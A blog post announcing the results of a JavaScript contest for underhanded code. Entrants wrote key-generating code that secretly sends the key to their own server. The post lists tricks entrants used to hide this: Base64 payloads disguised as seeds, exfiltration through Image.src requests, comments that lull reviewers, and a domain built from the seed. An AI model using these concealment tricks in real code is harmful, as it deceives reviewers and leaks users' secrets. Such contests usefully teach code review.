The First JavaScript Misdirection Contest

by Peter Jaric

Finally we have a winner!

But first, some background. One month ago, on the 29th of August, I announced the JavaScript Misdirection Contest:

There is a programming contest called The Underhanded C Contest. In their own words, it is “an annual contest to write innocent-looking C code implementing malicious behavior”. I am very much intrigued by that concept, but as my C-skills have declined considerably, I recently wished that there also was a JavaScript version. Pepe Vila suggested that I should start one myself, and here it is.

In short, the goal of the contest was to write code that generated a key for a made-up crypto coin called VDC, and at the same time include hidden code to send that key to your own server. Read more about it, and all the rules, over at misdirect.ion.land.

The kind people over at Detectify (who make a great web based security scanner) donated the first prize, a cool pentesting device called the USB Rubber Ducky Deluxe.

The contest ended the 13th of September, and at that time I had got 40 submissions, of which 34 were valid. The number of submissions and the nice comments I got from the contestants made the contest a success to me.

The winner

And now to what you’ve all been waiting for, the results. I have decided to award the first prize in the JavaScript Misdirection Contest #0 to…

Aymeric Beaumet!

Congratulations!

I liked his submission because it is short and still manages to include hidden evil code. Most other contest submissions were far longer. You can check out his entry over here: http://jsfiddle.net/c6z0kb4g/0 I’ve included Aymeric’s own description of his submission, but not right here.

The runner-up is Jesse Eedrah, who used a cool unicode trick to misdirect the reader. You can find it here: http://jsfiddle.net/afswj8cL/0 Jesse also put an explanation at GitHub: https://github.com/eedrah/Javascript-Misdirection-Entry

At the end of the post follow the other entries (except for a few who wished to be removed from this list). Do you think I made the right choice, or is there a more worthy winner?

Submitted code

Some random thoughts about the submissions:

  • Many contestants hid the evil code in a Base64-encoded block, often masked as a seed or key.
  • Using Image.src as a way to send the key was very common. I also used it in my example, maybe that was the reason.
  • Another trick used by more than one, was to include a link to StackOverflow in a comment. I think that was quite clever, because as a code reviewer (and creator) I am used to find these kind of comments that explain unusual code.
  • Generally I find it easier to skip over code that has a good comment above it, so I think that is a good trick too.

Next time?

This was the first JavaScript Misdirection Contest. That kind of implies that there will be another one. :) Hopefully I will run it again later on, but probably not until next year. I’ve learned a few things from this round; most of all that it takes a lot of time, which I don’t have. So the next time I will try to do things a little differently, and luckily I have a few ideas.

Thanks

I have not done this all by myself. I’d like to thank Jacob Soo, Jonatan Heyman, Victor Haffreingue, File Descriptor and Detectify.

Other solutions

These are the other valid submissions (except for those who elected to be removed):

_nderscore http://jsfiddle.net/now9fmvv/0
A. Levin https://jsfiddle.net/31vnwus9/0
Agop Shirinian https://jsfiddle.net/fs885ys8/0
Aleksandr Belkin http://jsfiddle.net/8tL4m43j/0
Alex http://jsfiddle.net/z4v88k00/0
Andrew Moffat http://jsfiddle.net/xvdmch0s/0
Aymeric Beaumet http://jsfiddle.net/c6z0kb4g/0
Calle Svensson https://jsfiddle.net/qpfs1vjz/0
Carl Zulauf http://jsfiddle.net/nvL6g8xd/0
Craig Spence http://jsfiddle.net/74k2hd7e/0
David G http://jsfiddle.net/w02rdLcn/0
David Roberts https://jsfiddle.net/4nqnhrpp/0
Donald Abrams http://jsfiddle.net/by6ukh09/0
Duncan Hall http://jsfiddle.net/gp80d9pf/0/
Emil Stenström http://jsfiddle.net/6epxLfny/0
Ephi Gabay http://jsfiddle.net/65p7y1xf/0
Eran Schoellhorn http://jsfiddle.net/absf4uur/0
Evan Hahn https://jsfiddle.net/jjr6nfjd/0
Jeka Kiselyov http://jsfiddle.net/pLntoqj0/0
Jesse Eedrah http://jsfiddle.net/afswj8cL/0
Jonas P. Hyatt http://jsfiddle.net/b0cLhfqu/0
Jonathan Mann http://jsfiddle.net/1b41dehs/0
Kaley Crum http://jsfiddle.net/y8L8ar4a/0
Kamil Vavra https://jsfiddle.net/ashvwfz0/0
Kevin Bedi http://jsfiddle.net/esgrdjag/0
Kristov Atlas http://jsfiddle.net/m9qxh8q1/0
Michael Hayes http://jsfiddle.net/n0hLga7p/0
nick http://jsfiddle.net/omeeshu3/0
Olivier Arteau https://jsfiddle.net/watLyqzj/0
Ondřej Žára http://jsfiddle.net/3qgun1u1/0
Peabnuts123 http://jsfiddle.net/fgw464v5/0
poerhiz http://jsfiddle.net/a39qwbv7/0
@devsbh https://jsfiddle.net/4je730xn/0
Stephen Checkoway http://jsfiddle.net/ptgru5du/0
Timo Kissing http://jsfiddle.net/sk7c3o57/0

Aymeric’s tricks

The tricks behind his solution, in his own words:

– perform a request leveraging Image.src
– generate the seed as being `src`
– use the seed to generate the domain name (src.sr)
– obfuscate the url construction as if it was the hash

Will send the generated key to __generated_key__.src.sr (necessitate the proper DNS Cname wildcard)